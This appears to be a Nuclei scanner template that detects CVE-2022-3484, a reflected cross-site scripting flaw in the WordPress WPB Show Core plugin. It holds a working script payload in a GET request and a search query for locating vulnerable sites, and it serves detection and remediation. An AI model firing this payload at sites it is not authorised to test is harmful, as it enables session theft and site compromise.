id: CVE-2022-3484 info: name: WordPress WPB Show Core - Cross-Site Scripting author: theamanrawat severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. remediation: | Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3484 cwe-id: CWE-79 epss-score: 0.00119 epss-percentile: 0.45893 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: wpb_show_core_project product: wpb_show_core framework: wordpress google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "wpb_jplayer_setting")' - 'contains(body, "")' condition: and # digest: 4b0a00483046022100b082900a2cbcc8d5568a027f90d1e342cede08662b75d90b113af08d8ca03548022100ce7267a64ed1bdd3ccdcd07ad6e7a7f93e6ae08b7a87bf81004ac69ce3fb644b:922c64590222798bb761d5b6d8e72950